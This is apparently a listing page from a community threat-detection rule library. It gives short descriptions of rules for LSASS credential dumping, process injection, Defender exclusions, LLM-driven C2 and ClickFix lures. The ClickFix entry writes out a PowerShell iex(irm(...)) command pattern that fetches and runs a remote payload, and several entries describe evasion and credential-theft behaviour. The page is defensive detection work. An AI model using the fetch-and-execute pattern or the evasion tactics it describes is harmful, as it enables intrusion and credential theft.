Detections

Explore public detection logic contributed by the community across SIEM and rule languages.

39,261 detections

Detects the use of PowerShell to modify Microsoft Defender settings to add an exclusion path within the AppData directory. This behavior is often associated with malware or threat actors attempting to whitelist malicious payloads to evade security scanning.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
17 days ago
004
Detects a trojanized Electron application performing anti-sandbox environment checks by querying GPU hardware information via WMI or PowerShell CIM cmdlets. This activity is characterized by the presence of the PYTHONUTF8 environment variable and is identified as a precursor step to attempting Microsoft Defender exclusions and launching a malicious payload.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
17 days ago
004
This rule detects the creation or modification of a DLL file within the 'ProgramData\CrossDevice' directory, or the modification of a specific COM CLSID InprocServer32 registry key associated with 'CrossDevice.Streaming.Source.dll'. This behavior is indicative of potential COM hijacking or persistence mechanisms targeting the CrossDevice streaming framework.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
17 days ago
104
Detects signs of the ClosedQuorum implant by correlating at least two redundant persistence mechanisms (Registry Run keys, Scheduled Tasks, WMI execution) on the same host within a 10-minute window. The rule focuses on artifacts originating from suspicious user-writable paths or unsigned binaries, while excluding known legitimate installation paths.
avatar
Arnold Chan@slaz
avatar
Detection & Hunting Community
16 days ago
003
Detects signs of the ClosedQuorum implant by correlating at least two redundant persistence mechanisms (Registry Run keys, Scheduled Tasks, WMI execution) on the same host within a 10-minute window. The rule focuses on artifacts originating from suspicious user-writable paths or unsigned binaries, while excluding known legitimate installation paths.
avatar
Arnold Chan@slaz
avatar
Hunters
16 days ago
003
Detects potential process injection attempts (e.g., Early Bird APC injection or process hollowing) where a process is spawned in a suspended state, followed shortly by a remote-thread or QueueUserAPC injection primitive targeting that same process. The rule correlates process creation events with subsequent API calls while excluding known legitimate patterns like .NET runtime operations, system updaters, and EDR/AV security components.
avatar
Arnold Chan@slaz
avatar
Hunters
16 days ago
103
Detects potential process injection attempts (e.g., Early Bird APC injection or process hollowing) where a process is spawned in a suspended state, followed shortly by a remote-thread or QueueUserAPC injection primitive targeting that same process. The rule correlates process creation events with subsequent API calls while excluding known legitimate patterns like .NET runtime operations, system updaters, and EDR/AV security components.
avatar
Arnold Chan@slaz
avatar
Detections.ai Community
16 days ago
103
Detects lateral movement (SMB, RDP, WinRM) performed by a host within 5 minutes of communicating with specific commercial LLM APIs. This rule targets behaviors indicative of automated lateral movement driven by an LLM-based C2, excluding common administrative tools, standard business hours, and frequently used processes.
avatar
Arnold Chan@slaz
avatar
Detections.ai Community
16 days ago
003
Detects the execution of multiple distinct host reconnaissance commands (e.g., systeminfo, whoami, ipconfig, AV/EDR checks, and domain enumeration) within a short window (10 minutes) originating from the same parent process. This pattern is characteristic of automated reconnaissance collection, often performed during the initial phases of an attack or as part of a C2 workflow. The rule includes exclusions for common administrative, monitoring, and RMM tools to reduce false positives.
avatar
Arnold Chan@slaz
avatar
Detections.ai Community
16 days ago
003
Detects a non-browser process initiating network connections to four distinct commercial LLM API providers (DeepSeek, OpenRouter, Mistral, and Google Gemini) within a 5-minute interval. This behavior is indicative of a C2 pattern where an adversary uses multiple LLM backends to perform plurality-vote or redundant queries, bypassing typical browser-based AI aggregation services.
avatar
Arnold Chan@slaz
avatar
Detection & Hunting Community
16 days ago
003
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
avatar
Ankit Mehta@Secvyn
avatar
Detection & Hunting Community
16 days ago
003
Detects the Sckit Go implant accessing sensitive local configuration and credential files, including SSH keys, cloud CLI tokens, and package manager credentials. The rule monitors for file read events initiated by processes identified as 'sckit' or processes with specific command line arguments.
avatar
Arnold Chan@slaz
avatar
Detection & Hunting Community
16 days ago
003
Detects the Sckit Go implant accessing sensitive local configuration and credential files, including SSH keys, cloud CLI tokens, and package manager credentials. The rule monitors for file read events initiated by processes identified as 'sckit' or processes with specific command line arguments.
avatar
Arnold Chan@slaz
avatar
Hunters
16 days ago
003
This rule detects installation of known malicious npm packages associated with the PhantomSub campaign, which abuse WhatsApp spam channels. It also identifies network connections to known remote C2 channel-list URLs or domains used by these packages to automate channel joining.
avatar
Arnold Chan@slaz
Defender - KQL
10 days ago
000
This rule detects the creation of potentially malicious script or executable files (.bat, .ps1, .exe, .vbs) within the Windows Startup folder. It triggers when these files are created by processes typically used for automation or development (dotnet, python) or processes utilizing specific semantic/download-related command lines. The rule further correlates this activity with the presence of PowerShell commands indicative of script downloading or code execution (e.g., IEX, DownloadString) by the same device within the same timeframe, suggesting persistent execution of potentially malicious code.
avatar
Ishaan S@isrv
avatar
Hunters
16 days ago
003
Detects the execution of pypykatz or Python scripts invoking pypykatz commands to perform credential dumping, specifically targeting LSASS memory or minidump files.
avatar
Ankit Mehta@Secvyn
avatar
SlimKQL
12 days ago
001
Detects a process initiating a memory dump of lsass.exe (using --dump arguments) followed within 15 minutes by the creation of a hexadecimal-named .tmp file in the Windows\Temp directory. This behavioral pattern is characteristic of credential dumping using reflected cloning or similar techniques, followed by the staging of obfuscated or encrypted minidump data for exfiltration.
avatar
Ankit Mehta@Secvyn
avatar
SlimKQL
12 days ago
001
This rule detects LSASS credential dumping attempts by correlating the execution of a dump command (via process command line) with the subsequent creation of a temporary file in the Windows Temp directory. The rule is specifically designed to bypass evasion techniques that introduce randomized delays between the LSASS process access and the file write operation by utilizing a 30-minute join window.
avatar
Ankit Mehta@Secvyn
avatar
SlimKQL
12 days ago
001
Detects the pidclone-style LSASS credential dumper that clones the target process into a suspended state, mirrors its memory, generates a minidump, and writes an XOR-encrypted copy of the dump to a randomized filename under Windows\Temp
avatar
Ankit Mehta@Secvyn
avatar
SlimKQL
12 days ago
001
Detects a sequence of events indicative of LSASS memory dumping where a process opens a handle to lsass.exe and subsequently creates a uniquely named temporary file (16-character hexadecimal filename) in the Windows Temp directory within a short timeframe. This behavior is often associated with the obfuscated flushing of a stolen memory dump to disk to evade signature-based detection.
avatar
Ankit Mehta@Secvyn
avatar
SlimKQL
12 days ago
101
Detects the execution of pypykatz or Python scripts invoking pypykatz commands to perform credential dumping, specifically targeting LSASS memory or minidump files.
avatar
Ankit Mehta@Secvyn
avatar
Detections.ai Community
12 days ago
001
Page 111 of 1870